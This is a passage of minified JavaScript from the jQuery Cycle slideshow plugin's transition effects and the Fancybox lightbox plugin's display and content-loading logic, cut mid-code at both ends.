v;}}return"#ffffff";}$slides.each(function(){$(this).css("background-color",getBg(this));});}$.fn.cycle.commonReset=function(curr,next,opts,w,h,rev){$(opts.elements).not(curr).hide();opts.cssBefore.opacity=1;opts.cssBefore.display="block";if(w!==false&&next.cycleW>0){opts.cssBefore.width=next.cycleW;}if(h!==false&&next.cycleH>0){opts.cssBefore.height=next.cycleH;}opts.cssAfter=opts.cssAfter||{};opts.cssAfter.display="none";$(curr).css("zIndex",opts.slideCount+(rev===true?1:0));$(next).css("zIndex",opts.slideCount+(rev===true?0:1));};$.fn.cycle.custom=function(curr,next,opts,cb,speedOverride){var $l=$(curr),$n=$(next);var speedIn=opts.speedIn,speedOut=opts.speedOut,easeIn=opts.easeIn,easeOut=opts.easeOut;$n.css(opts.cssBefore);if(speedOverride){if(typeof speedOverride=="number"){speedIn=speedOut=speedOverride;}else{speedIn=speedOut=1;}easeIn=easeOut=null;}var fn=function(){$n.animate(opts.animIn,speedIn,easeIn,cb);};$l.animate(opts.animOut,speedOut,easeOut,function(){if(opts.cssAfter){$l.css(opts.cssAfter);}if(!opts.sync){fn();}});if(opts.sync){fn();}};$.fn.cycle.transitions={fade:function($cont,$slides,opts){$slides.not(":eq("+opts.currSlide+")").css("opacity",0);opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts);opts.cssBefore.opacity=0;});opts.animIn={opacity:1};opts.animOut={opacity:0};opts.cssBefore={top:0,left:0};}};$.fn.cycle.ver=function(){return ver;};$.fn.cycle.defaults={fx:"fade",timeout:4000,timeoutFn:null,continuous:0,speed:1000,speedIn:null,speedOut:null,next:null,prev:null,prevNextClick:null,prevNextEvent:"click.cycle",pager:null,pagerClick:null,pagerEvent:"click.cycle",allowPagerClickBubble:false,pagerAnchorBuilder:null,before:null,after:null,end:null,easing:null,easeIn:null,easeOut:null,shuffle:null,animIn:null,animOut:null,cssBefore:null,cssAfter:null,fxFn:null,height:"auto",startingSlide:0,sync:1,random:0,fit:0,containerResize:1,pause:0,pauseOnPagerHover:0,autostop:0,autostopCount:0,delay:0,slideExpr:null,cleartype:!$.support.opacity,cleartypeNoBg:false,nowrap:0,fastOnEvent:0,randomizeEffects:1,rev:0,manualTrump:true,requeueOnImageNotLoaded:true,requeueTimeout:250,activePagerClass:"activeSlide",updateActivePagerLink:null};})(jQuery);(function($){$.fn.cycle.transitions.none=function($cont,$slides,opts){opts.fxFn=function(curr,next,opts,after){$(next).show();$(curr).hide();after();};};$.fn.cycle.transitions.scrollUp=function($cont,$slides,opts){$cont.css("overflow","hidden");opts.before.push($.fn.cycle.commonReset);var h=$cont.height();opts.cssBefore={top:h,left:0};opts.cssFirst={top:0};opts.animIn={top:0};opts.animOut={top:-h};};$.fn.cycle.transitions.scrollDown=function($cont,$slides,opts){$cont.css("overflow","hidden");opts.before.push($.fn.cycle.commonReset);var h=$cont.height();opts.cssFirst={top:0};opts.cssBefore={top:-h,left:0};opts.animIn={top:0};opts.animOut={top:h};};$.fn.cycle.transitions.scrollLeft=function($cont,$slides,opts){$cont.css("overflow","hidden");opts.before.push($.fn.cycle.commonReset);var w=$cont.width();opts.cssFirst={left:0};opts.cssBefore={left:w,top:0};opts.animIn={left:0};opts.animOut={left:0-w};};$.fn.cycle.transitions.scrollRight=function($cont,$slides,opts){$cont.css("overflow","hidden");opts.before.push($.fn.cycle.commonReset);var w=$cont.width();opts.cssFirst={left:0};opts.cssBefore={left:-w,top:0};opts.animIn={left:0};opts.animOut={left:w};};$.fn.cycle.transitions.scrollHorz=function($cont,$slides,opts){$cont.css("overflow","hidden").width();opts.before.push(function(curr,next,opts,fwd){$.fn.cycle.commonReset(curr,next,opts);opts.cssBefore.left=fwd?(next.cycleW-1):(1-next.cycleW);opts.animOut.left=fwd?-curr.cycleW:curr.cycleW;});opts.cssFirst={left:0};opts.cssBefore={top:0};opts.animIn={left:0};opts.animOut={top:0};};$.fn.cycle.transitions.scrollVert=function($cont,$slides,opts){$cont.css("overflow","hidden");opts.before.push(function(curr,next,opts,fwd){$.fn.cycle.commonReset(curr,next,opts);opts.cssBefore.top=fwd?(1-next.cycleH):(next.cycleH-1);opts.animOut.top=fwd?curr.cycleH:-curr.cycleH;});opts.cssFirst={top:0};opts.cssBefore={left:0};opts.animIn={top:0};opts.animOut={left:0};};$.fn.cycle.transitions.slideX=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$(opts.elements).not(curr).hide();$.fn.cycle.commonReset(curr,next,opts,false,true);opts.animIn.width=next.cycleW;});opts.cssBefore={left:0,top:0,width:0};opts.animIn={width:"show"};opts.animOut={width:0};};$.fn.cycle.transitions.slideY=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$(opts.elements).not(curr).hide();$.fn.cycle.commonReset(curr,next,opts,true,false);opts.animIn.height=next.cycleH;});opts.cssBefore={left:0,top:0,height:0};opts.animIn={height:"show"};opts.animOut={height:0};};$.fn.cycle.transitions.shuffle=function($cont,$slides,opts){var i,w=$cont.css("overflow","visible").width();$slides.css({left:0,top:0});opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,true,true);});if(!opts.speedAdjusted){opts.speed=opts.speed/2;opts.speedAdjusted=true;}opts.random=0;opts.shuffle=opts.shuffle||{left:-w,top:15};opts.els=[];for(i=0;i<$slides.length;i++){opts.els.push($slides[i]);}for(i=0;i<opts.currSlide;i++){opts.els.push(opts.els.shift());}opts.fxFn=function(curr,next,opts,cb,fwd){var $el=fwd?$(curr):$(next);$(next).css(opts.cssBefore);var count=opts.slideCount;$el.animate(opts.shuffle,opts.speedIn,opts.easeIn,function(){var hops=$.fn.cycle.hopsFromLast(opts,fwd);for(var k=0;k<hops;k++){fwd?opts.els.push(opts.els.shift()):opts.els.unshift(opts.els.pop());}if(fwd){for(var i=0,len=opts.els.length;i<len;i++){$(opts.els[i]).css("z-index",len-i+count);}}else{var z=$(curr).css("z-index");$el.css("z-index",parseInt(z)+1+count);}$el.animate({left:0,top:0},opts.speedOut,opts.easeOut,function(){$(fwd?this:curr).hide();if(cb){cb();}});});};opts.cssBefore={display:"block",opacity:1,top:0,left:0};};$.fn.cycle.transitions.turnUp=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,false);opts.cssBefore.top=next.cycleH;opts.animIn.height=next.cycleH;});opts.cssFirst={top:0};opts.cssBefore={left:0,height:0};opts.animIn={top:0};opts.animOut={height:0};};$.fn.cycle.transitions.turnDown=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,false);opts.animIn.height=next.cycleH;opts.animOut.top=curr.cycleH;});opts.cssFirst={top:0};opts.cssBefore={left:0,top:0,height:0};opts.animOut={height:0};};$.fn.cycle.transitions.turnLeft=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,true);opts.cssBefore.left=next.cycleW;opts.animIn.width=next.cycleW;});opts.cssBefore={top:0,width:0};opts.animIn={left:0};opts.animOut={width:0};};$.fn.cycle.transitions.turnRight=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,true);opts.animIn.width=next.cycleW;opts.animOut.left=curr.cycleW;});opts.cssBefore={top:0,left:0,width:0};opts.animIn={left:0};opts.animOut={width:0};};$.fn.cycle.transitions.zoom=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,false,true);opts.cssBefore.top=next.cycleH/2;opts.cssBefore.left=next.cycleW/2;opts.animIn={top:0,left:0,width:next.cycleW,height:next.cycleH};opts.animOut={width:0,height:0,top:curr.cycleH/2,left:curr.cycleW/2};});opts.cssFirst={top:0,left:0};opts.cssBefore={width:0,height:0};};$.fn.cycle.transitions.fadeZoom=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,false);opts.cssBefore.left=next.cycleW/2;opts.cssBefore.top=next.cycleH/2;opts.animIn={top:0,left:0,width:next.cycleW,height:next.cycleH};});opts.cssBefore={width:0,height:0};opts.animOut={opacity:0};};$.fn.cycle.transitions.blindX=function($cont,$slides,opts){var w=$cont.css("overflow","hidden").width();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts);opts.animIn.width=next.cycleW;opts.animOut.left=curr.cycleW;});opts.cssBefore={left:w,top:0};opts.animIn={left:0};opts.animOut={left:w};};$.fn.cycle.transitions.blindY=function($cont,$slides,opts){var h=$cont.css("overflow","hidden").height();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts);opts.animIn.height=next.cycleH;opts.animOut.top=curr.cycleH;});opts.cssBefore={top:h,left:0};opts.animIn={top:0};opts.animOut={top:h};};$.fn.cycle.transitions.blindZ=function($cont,$slides,opts){var h=$cont.css("overflow","hidden").height();var w=$cont.width();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts);opts.animIn.height=next.cycleH;opts.animOut.top=curr.cycleH;});opts.cssBefore={top:h,left:w};opts.animIn={top:0,left:0};opts.animOut={top:h,left:w};};$.fn.cycle.transitions.growX=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,true);opts.cssBefore.left=this.cycleW/2;opts.animIn={left:0,width:this.cycleW};opts.animOut={left:0};});opts.cssBefore={width:0,top:0};};$.fn.cycle.transitions.growY=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,false);opts.cssBefore.top=this.cycleH/2;opts.animIn={top:0,height:this.cycleH};opts.animOut={top:0};});opts.cssBefore={height:0,left:0};};$.fn.cycle.transitions.curtainX=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,true,true);opts.cssBefore.left=next.cycleW/2;opts.animIn={left:0,width:this.cycleW};opts.animOut={left:curr.cycleW/2,width:0};});opts.cssBefore={top:0,width:0};};$.fn.cycle.transitions.curtainY=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,false,true);opts.cssBefore.top=next.cycleH/2;opts.animIn={top:0,height:next.cycleH};opts.animOut={top:curr.cycleH/2,height:0};});opts.cssBefore={left:0,height:0};};$.fn.cycle.transitions.cover=function($cont,$slides,opts){var d=opts.direction||"left";var w=$cont.css("overflow","hidden").width();var h=$cont.height();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts);if(d=="right"){opts.cssBefore.left=-w;}else{if(d=="up"){opts.cssBefore.top=h;}else{if(d=="down"){opts.cssBefore.top=-h;}else{opts.cssBefore.left=w;}}}});opts.animIn={left:0,top:0};opts.animOut={opacity:1};opts.cssBefore={top:0,left:0};};$.fn.cycle.transitions.uncover=function($cont,$slides,opts){var d=opts.direction||"left";var w=$cont.css("overflow","hidden").width();var h=$cont.height();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,true,true);if(d=="right"){opts.animOut.left=w;}else{if(d=="up"){opts.animOut.top=-h;}else{if(d=="down"){opts.animOut.top=h;}else{opts.animOut.left=-w;}}}});opts.animIn={left:0,top:0};opts.animOut={opacity:1};opts.cssBefore={top:0,left:0};};$.fn.cycle.transitions.toss=function($cont,$slides,opts){var w=$cont.css("overflow","visible").width();var h=$cont.height();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,true,true);if(!opts.animOut.left&&!opts.animOut.top){opts.animOut={left:w*2,top:-h/2,opacity:0};}else{opts.animOut.opacity=0;}});opts.cssBefore={left:0,top:0};opts.animIn={left:0};};$.fn.cycle.transitions.wipe=function($cont,$slides,opts){var w=$cont.css("overflow","hidden").width();var h=$cont.height();opts.cssBefore=opts.cssBefore||{};var clip;if(opts.clip){if(/l2r/.test(opts.clip)){clip="rect(0px 0px "+h+"px 0px)";}else{if(/r2l/.test(opts.clip)){clip="rect(0px "+w+"px "+h+"px "+w+"px)";}else{if(/t2b/.test(opts.clip)){clip="rect(0px "+w+"px 0px 0px)";}else{if(/b2t/.test(opts.clip)){clip="rect("+h+"px "+w+"px "+h+"px 0px)";}else{if(/zoom/.test(opts.clip)){var top=parseInt(h/2);var left=parseInt(w/2);clip="rect("+top+"px "+left+"px "+top+"px "+left+"px)";}}}}}}opts.cssBefore.clip=opts.cssBefore.clip||clip||"rect(0px 0px 0px 0px)";var d=opts.cssBefore.clip.match(/(\d+)/g);var t=parseInt(d[0]),r=parseInt(d[1]),b=parseInt(d[2]),l=parseInt(d[3]);opts.before.push(function(curr,next,opts){if(curr==next){return;}var $curr=$(curr),$next=$(next);$.fn.cycle.commonReset(curr,next,opts,true,true,false);opts.cssAfter.display="block";var step=1,count=parseInt((opts.speedIn/13))-1;(function f(){var tt=t?t-parseInt(step*(t/count)):0;var ll=l?l-parseInt(step*(l/count)):0;var bb=b<h?b+parseInt(step*((h-b)/count||1)):h;var rr=r<w?r+parseInt(step*((w-r)/count||1)):w;$next.css({clip:"rect("+tt+"px "+rr+"px "+bb+"px "+ll+"px)"});(step++<=count)?setTimeout(f,13):$curr.css("display","none");})();});opts.cssBefore={display:"block",opacity:1,top:0,left:0};opts.animIn={left:0};opts.animOut={left:0};};})(jQuery);;(function($){var tmp,loading,overlay,wrap,outer,inner,close,nav_left,nav_right,selectedIndex=0,selectedOpts={},selectedArray=[],currentIndex=0,currentOpts={},currentArray=[],ajaxLoader=null,imgPreloader=new Image(),imgRegExp=/\.(jpg|gif|png|bmp|jpeg)(.*)?$/i,swfRegExp=/[^\.]\.(swf)\s*$/i,loadingTimer,loadingFrame=1,start_pos,final_pos,busy=false,shadow=20,fx=$.extend($('<div/>')[0],{prop:0}),titleh=0,isIE6=!$.support.opacity&&!window.XMLHttpRequest,fancybox_abort=function(){loading.hide();imgPreloader.onerror=imgPreloader.onload=null;if(ajaxLoader){ajaxLoader.abort();}
tmp.empty();},fancybox_error=function(){$.fancybox('<p id="fancybox_error">The requested content cannot be loaded.<br />Please try again later.</p>',{'scrolling':'no','padding':20,'transitionIn':'none','transitionOut':'none'});},fancybox_get_viewport=function(){return[$(window).width(),$(window).height(),$(document).scrollLeft(),$(document).scrollTop()];},fancybox_get_zoom_to=function(){var view=fancybox_get_viewport(),to={},margin=currentOpts.margin,resize=currentOpts.autoScale,horizontal_space=(shadow+margin)*2,vertical_space=(shadow+margin)*2,double_padding=(currentOpts.padding*2),ratio;if(currentOpts.width.toString().indexOf('%')>-1){to.width=((view[0]*parseFloat(currentOpts.width))/100)-(shadow*2);resize=false;}else{to.width=currentOpts.width+double_padding;}
if(currentOpts.height.toString().indexOf('%')>-1){to.height=((view[1]*parseFloat(currentOpts.height))/100)-(shadow*2);resize=false;}else{to.height=currentOpts.height+double_padding;}
if(resize&&(to.width>(view[0]-horizontal_space)||to.height>(view[1]-vertical_space))){if(selectedOpts.type=='image'||selectedOpts.type=='swf'){horizontal_space+=double_padding;vertical_space+=double_padding;ratio=Math.min(Math.min(view[0]-horizontal_space,currentOpts.width)/currentOpts.width,Math.min(view[1]-vertical_space,currentOpts.height)/currentOpts.height);to.width=Math.round(ratio*(to.width-double_padding))+double_padding;to.height=Math.round(ratio*(to.height-double_padding))+double_padding;}else{to.width=Math.min(to.width,(view[0]-horizontal_space));to.height=Math.min(to.height,(view[1]-vertical_space));}}
to.top=view[3]+((view[1]-(to.height+(shadow*2)))*0.5);to.left=view[2]+((view[0]-(to.width+(shadow*2)))*0.5);if(currentOpts.autoScale===false){to.top=Math.max(view[3]+margin,to.top);to.left=Math.max(view[2]+margin,to.left);}
return to;},fancybox_format_title=function(title){if(title&&title.length){switch(currentOpts.titlePosition){case'inside':return title;case'over':return'<span id="fancybox-title-over">'+title+'</span>';default:return'<span id="fancybox-title-wrap"><span id="fancybox-title-left"></span><span id="fancybox-title-main">'+title+'</span><span id="fancybox-title-right"></span></span>';}}
return false;},fancybox_process_title=function(){var title=currentOpts.title,width=final_pos.width-(currentOpts.padding*2),titlec='fancybox-title-'+currentOpts.titlePosition;$('#fancybox-title').remove();titleh=0;if(currentOpts.titleShow===false){return;}
title=$.isFunction(currentOpts.titleFormat)?currentOpts.titleFormat(title,currentArray,currentIndex,currentOpts):fancybox_format_title(title);if(!title||title===''){return;}
$('<div id="fancybox-title" class="'+titlec+'" />').css({'width':width,'paddingLeft':currentOpts.padding,'paddingRight':currentOpts.padding}).html(title).appendTo('body');switch(currentOpts.titlePosition){case'inside':titleh=$("#fancybox-title").outerHeight(true)-currentOpts.padding;final_pos.height+=titleh;break;case'over':$('#fancybox-title').css('bottom',currentOpts.padding);break;default:$('#fancybox-title').css('bottom',$("#fancybox-title").outerHeight(true)*-1);break;}
$('#fancybox-title').appendTo(outer).hide();},fancybox_set_navigation=function(){$(document).unbind('keydown.fb').bind('keydown.fb',function(e){if(e.keyCode==27&&currentOpts.enableEscapeButton){e.preventDefault();$.fancybox.close();}else if(e.keyCode==37){e.preventDefault();$.fancybox.prev();}else if(e.keyCode==39){e.preventDefault();$.fancybox.next();}});if($.fn.mousewheel){wrap.unbind('mousewheel.fb');if(currentArray.length>1){wrap.bind('mousewheel.fb',function(e,delta){e.preventDefault();if(busy||delta===0){return;}
if(delta>0){$.fancybox.prev();}else{$.fancybox.next();}});}}
if(!currentOpts.showNavArrows){return;}
if((currentOpts.cyclic&&currentArray.length>1)||currentIndex!==0){nav_left.show();}
if((currentOpts.cyclic&&currentArray.length>1)||currentIndex!=(currentArray.length-1)){nav_right.show();}},fancybox_preload_images=function(){var href,objNext;if((currentArray.length-1)>currentIndex){href=currentArray[currentIndex+1].href;if(typeof href!=='undefined'&&href.match(imgRegExp)){objNext=new Image();objNext.src=href;}}
if(currentIndex>0){href=currentArray[currentIndex-1].href;if(typeof href!=='undefined'&&href.match(imgRegExp)){objNext=new Image();objNext.src=href;}}},_finish=function(){inner.css('overflow',(currentOpts.scrolling=='auto'?(currentOpts.type=='image'||currentOpts.type=='iframe'||currentOpts.type=='swf'?'hidden':'auto'):(currentOpts.scrolling=='yes'?'auto':'visible')));if(!$.support.opacity){inner.get(0).style.removeAttribute('filter');wrap.get(0).style.removeAttribute('filter');}
$('#fancybox-title').show();if(currentOpts.hideOnContentClick){inner.one('click',$.fancybox.close);}
if(currentOpts.hideOnOverlayClick){overlay.one('click',$.fancybox.close);}
if(currentOpts.showCloseButton){close.show();}
fancybox_set_navigation();$(window).bind("resize.fb",$.fancybox.center);if(currentOpts.centerOnScroll){$(window).bind("scroll.fb",$.fancybox.center);}else{$(window).unbind("scroll.fb");}
if($.isFunction(currentOpts.onComplete)){currentOpts.onComplete(currentArray,currentIndex,currentOpts);}
busy=false;fancybox_preload_images();},fancybox_draw=function(pos){var width=Math.round(start_pos.width+(final_pos.width-start_pos.width)*pos),height=Math.round(start_pos.height+(final_pos.height-start_pos.height)*pos),top=Math.round(start_pos.top+(final_pos.top-start_pos.top)*pos),left=Math.round(start_pos.left+(final_pos.left-start_pos.left)*pos);wrap.css({'width':width+'px','height':height+'px','top':top+'px','left':left+'px'});width=Math.max(width-currentOpts.padding*2,0);height=Math.max(height-(currentOpts.padding*2+(titleh*pos)),0);inner.css({'width':width+'px','height':height+'px'});if(typeof final_pos.opacity!=='undefined'){wrap.css('opacity',(pos<0.5?0.5:pos));}},fancybox_get_obj_pos=function(obj){var pos=obj.offset();pos.top+=parseFloat(obj.css('paddingTop'))||0;pos.left+=parseFloat(obj.css('paddingLeft'))||0;pos.top+=parseFloat(obj.css('border-top-width'))||0;pos.left+=parseFloat(obj.css('border-left-width'))||0;pos.width=obj.width();pos.height=obj.height();return pos;},fancybox_get_zoom_from=function(){var orig=selectedOpts.orig?$(selectedOpts.orig):false,from={},pos,view;if(orig&&orig.length){pos=fancybox_get_obj_pos(orig);from={width:(pos.width+(currentOpts.padding*2)),height:(pos.height+(currentOpts.padding*2)),top:(pos.top-currentOpts.padding-shadow),left:(pos.left-currentOpts.padding-shadow)};}else{view=fancybox_get_viewport();from={width:1,height:1,top:view[3]+view[1]*0.5,left:view[2]+view[0]*0.5};}
return from;},fancybox_show=function(){loading.hide();if(wrap.is(":visible")&&$.isFunction(currentOpts.onCleanup)){if(currentOpts.onCleanup(currentArray,currentIndex,currentOpts)===false){$.event.trigger('fancybox-cancel');busy=false;return;}}
currentArray=selectedArray;currentIndex=selectedIndex;currentOpts=selectedOpts;inner.get(0).scrollTop=0;inner.get(0).scrollLeft=0;if(currentOpts.overlayShow){if(isIE6){$('select:not(#fancybox-tmp select)').filter(function(){return this.style.visibility!=='hidden';}).css({'visibility':'hidden'}).one('fancybox-cleanup',function(){this.style.visibility='inherit';});}
overlay.css({'background-color':currentOpts.overlayColor,'opacity':currentOpts.overlayOpacity}).unbind().show();}
final_pos=fancybox_get_zoom_to();fancybox_process_title();if(wrap.is(":visible")){$(close.add(nav_left).add(nav_right)).hide();var pos=wrap.position(),equal;start_pos={top:pos.top,left:pos.left,width:wrap.width(),height:wrap.height()};equal=(start_pos.width==final_pos.width&&start_pos.height==final_pos.height);inner.fadeOut(currentOpts.changeFade,function(){var finish_resizing=function(){inner.html(tmp.contents()).fadeIn(currentOpts.changeFade,_finish);};$.event.trigger('fancybox-change');inner.empty().css('overflow','hidden');if(equal){inner.css({top:currentOpts.padding,left:currentOpts.padding,width:Math.max(final_pos.width-(currentOpts.padding*2),1),height:Math.max(final_pos.height-(currentOpts.padding*2)-titleh,1)});finish_resizing();}else{inner.css({top:currentOpts.padding,left:currentOpts.padding,width:Math.max(start_pos.width-(currentOpts.padding*2),1),height:Math.max(start_pos.height-(currentOpts.padding*2),1)});fx.prop=0;$(fx).animate({prop:1},{duration:currentOpts.changeSpeed,easing:currentOpts.easingChange,step:fancybox_draw,complete:finish_resizing});}});return;}
wrap.css('opacity',1);if(currentOpts.transitionIn=='elastic'){start_pos=fancybox_get_zoom_from();inner.css({top:currentOpts.padding,left:currentOpts.padding,width:Math.max(start_pos.width-(currentOpts.padding*2),1),height:Math.max(start_pos.height-(currentOpts.padding*2),1)}).html(tmp.contents());wrap.css(start_pos).show();if(currentOpts.opacity){final_pos.opacity=0;}
fx.prop=0;$(fx).animate({prop:1},{duration:currentOpts.speedIn,easing:currentOpts.easingIn,step:fancybox_draw,complete:_finish});}else{inner.css({top:currentOpts.padding,left:currentOpts.padding,width:Math.max(final_pos.width-(currentOpts.padding*2),1),height:Math.max(final_pos.height-(currentOpts.padding*2)-titleh,1)}).html(tmp.contents());wrap.css(final_pos).fadeIn(currentOpts.transitionIn=='none'?0:currentOpts.speedIn,_finish);}},fancybox_process_inline=function(){tmp.width(selectedOpts.width);tmp.height(selectedOpts.height);if(selectedOpts.width=='auto'){selectedOpts.width=tmp.width();}
if(selectedOpts.height=='auto'){selectedOpts.height=tmp.height();}
fancybox_show();},fancybox_process_image=function(){busy=true;selectedOpts.width=imgPreloader.width;selectedOpts.height=imgPreloader.height;$("<img />").attr({'id':'fancybox-img','src':imgPreloader.src,'alt':selectedOpts.title}).appendTo(tmp);fancybox_show();},fancybox_start=function(){fancybox_abort();var obj=selectedArray[selectedIndex],href,type,title,str,emb,selector,data;selectedOpts=$.extend({},$.fn.fancybox.defaults,(typeof $(obj).data('fancybox')=='undefined'?selectedOpts:$(obj).data('fancybox')));title=obj.title||$(obj).title||selectedOpts.title||'';if(obj.nodeName&&!selectedOpts.orig){selectedOpts.orig=$(obj).children("img:first").length?$(obj).children("img:first"):$(obj);}
if(title===''&&selectedOpts.orig){title=selectedOpts.orig.attr('alt');}
if(obj.nodeName&&(/^(?:javascript|#)/i).test(obj.href)){href=selectedOpts.href||null;}else{href=selectedOpts.href||obj.href||null;}
if(selectedOpts.type){type=selectedOpts.type;if(!href){href=selectedOpts.content;}}else if(selectedOpts.content){type='html';}else if(href){if(href.match(imgRegExp)){type='image';}else if(href.match(swfRegExp)){type='swf';}else if($(obj).hasClass("iframe")){type='iframe';}else if(href.match(/#/)){obj=href.substr(href.indexOf("#"));type=$(obj).length>0?'inline':'ajax';}else{type='ajax';}}else{type='inline';}
selectedOpts.type=type;selectedOpts.href=href;selectedOpts.title=title;if(selectedOpts.autoDimensions&&selectedOpts.type!=='iframe'&&selectedOpts.type!=='swf'){selectedOpts.width='auto';selectedOpts.height='auto';}
if(selectedOpts.modal){selectedOpts.overlayShow=true;selectedOpts.hideOnOverlayClick=false;selectedOpts.hideOnContentClick=false;selectedOpts.enableEscapeButton=false;selectedOpts.showCloseButton=false;}
if($.isFunction(selectedOpts.onStart)){if(selectedOpts.onStart(selectedArray,selectedIndex,selectedOpts)===false){busy=false;return;}}
tmp.css('padding',(shadow+selectedOpts.padding+selectedOpts.margin));$('.fancybox-inline-tmp').unbind('fancybox-cancel').bind('fancybox-change',function(){$(this).replaceWith(inner.children());});switch(type){case'html':tmp.html(selectedOpts.content);fancybox_process_inline();break;case'inline':$('<div class="fancybox-inline-tmp" />').hide().insertBefore($(obj)).bind('fancybox-cleanup',function(){$(this).replaceWith(inner.children());}).bind('fancybox-cancel',function(){$(this).replaceWith(tmp.children());});$(obj).appendTo(tmp);fancybox_process_inline();break;case'image':busy=false;$.fancybox.showActivity();imgPreloader=new Image();imgPreloader.onerror=function(){fancybox_error();};imgPreloader.onload=function(){imgPreloader.onerror=null;imgPreloader.onload=null;fancybox_process_image();};imgPreloader.src=href;break;case'swf':str='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="'+selectedOpts.width+'" height="'+selectedOpts.height+'"><param name="movie" value="'+href+'"></param>';emb='';$.each(selectedOpts.swf,function(name,val){str+='<param name="'+name+'" value="'+val+'"></param>';emb+=' '+name+'="'+val+'"';});str+='<embed src="'+href+'" type="application/x-shockwave-flash" width="'+selectedOpts.width+'" height="'+selectedOpts.height+'"'+emb+'></embed></object>';tmp.html(str);fancybox_process_inline();break;case'ajax':selector=href.split('#',2);data=selectedOpts.ajax.data||{};if(selector.length>1){href=selector[0];if(typeof data=="string"){data+='&selector='+selector[1];}else{data.selector=selector[1];}}
busy=false;$.fancybox.showActivity();ajaxLoader=$.ajax($.extend(selectedOpts.ajax,{url:href,data:data,error:fancybox_error,success:function(data,textStatus,XMLHttpRequest){if(ajaxLoader.status==200){tmp.html(data);fancybox_process_inline();}}}));break;case'iframe':$('<iframe id="fancybox-frame" name="fancybox-frame'+new Date().getTime()+'" frameborder="0" hspace="0" scrolling="'+selectedOpts.scrolling+'" src="'+selectedOpts.href+'"></iframe>').appendTo(tmp);fancybox_show();break;}},fancybox_animate_loading=function(){if(!loading.is(':visible')){clearInterval(loadingTimer);return;}
$('div',loading).css('top',(loadingFrame*-40)+'px');loadingFrame=(loadingFrame+1)%12;},fancybox_init=function(){if($("#fancybox-wrap").length){return;}
$('body').append(tmp=$('<div id="fancybox-tmp"></div>'),loading=$('<div id="fancybox-loading"><div></div></div>'),overlay=$('<div id="fancybox-overlay"></div>'),wrap=$('<div id="fancybox-wrap"></div>'));if(!$.support.opacity){wrap.addClass('fancybox-ie');loading.addClass('fancybox-ie');}
outer=$('<div id="fancybox-outer"></div>').append('<div class="fancy-bg" id="fancy-bg-n"></div><div class="fancy-bg" id="fancy-bg-ne"></div><div class="fancy-bg" id="fancy-bg-e"></div><div class="fancy-bg" id="fancy-bg-se"></div><div class="fancy-bg" id="fancy-bg-s"></div><div class="fancy-bg" id="fancy-bg-sw"></div><div class="fancy-bg" id="fancy-bg-w"></div><div class="fancy-bg" id="fancy-bg-nw"></div>').appendTo(wrap);outer.append(inner=$('<div id="fancybox-inner"></div>'),close=$('<a id="fancybox-close"></a>'),nav_left=$('<a href="javascript:;" id="fancybox-left"><span class="fancy-ico" id="fancybox-left-ico"></span></a>'),nav_right=$('<a href="javascript:;" id="fancybox-right"><span class="fancy-ico" id="fancybox-right-ico"></span></a>'));close.click($.fancybox.close);loading.click($.fancybox.cancel);nav_left.click(function(e){e.preventDefault();$.fancybox.prev();});nav_right.click(function(e){e.preventDefault();$.fancybox.next();});if(isIE6){overlay.get(0).style.setExpression('height',"document.body.scrollHeight > document.body.offsetHeight ? document.body.scrollHeight : document.body.offsetHeight + 'px'");loading.get(0).style.setExpression('top',"(-20 + (document.documentElement.clientHeight ? document.documentElement.clientHeight/2 : document.body.clientHeight/2 ) + ( ignoreMe = document.documentElement.scrollTop ? document.documentElement.scrollTop : document.body.scrollTop )) + 'px'");outer.prepend('<iframe id="fancybox-hide-sel-frame" src="javascript:\'\';" scrolling="no" frameborder="0" ></iframe>');}};$.fn.fancybox=function(options){$(this).data('fancybox',$.extend({},options,($.metadata?$(this).metadata():{}))).unbind('click.fb').bind('click.fb',function(e){e.preventDefault();if(busy){return;}
busy=true;$(this).blur();selectedArray=[];selectedIndex=0;var rel=$(this).attr('rel')||'';if(!rel||rel==''||rel==='nofollow'){selectedArray.push(this);}else{selectedArray=$("a[rel="+rel+"], area[rel="+rel+"]");selectedIndex=selectedArray.index(this);}
fancybox_start();return false;});return this;};$.fancybox=function(obj){if(busy){return;}
busy=true;var opts=typeof arguments[1]!=='undefined'?arguments[1]:{};selectedArray=[];selectedIndex=opts.index||0;if($.isArray(obj)){for(var i=0,j=obj.length;i<j;i++){if(typeof obj[i]=='object'){$(obj[i]).data('fancybox',$.extend({},opts,obj[i]));}else{obj[i]=$({}).data('fancybox',$.extend({content:obj[i]},opts));}}
selectedArray=jQuery.merge(selectedArray,obj);}else{if(typeof obj=='object'){$(obj).data('fancybox',$.extend({},opts,obj));}else{obj=$({}).data('fancybox',$.extend({content:obj},opts));}
selectedArray.push(obj);}
if(selectedIndex>selectedArray.length||selectedIndex<0){selectedIndex=0;}
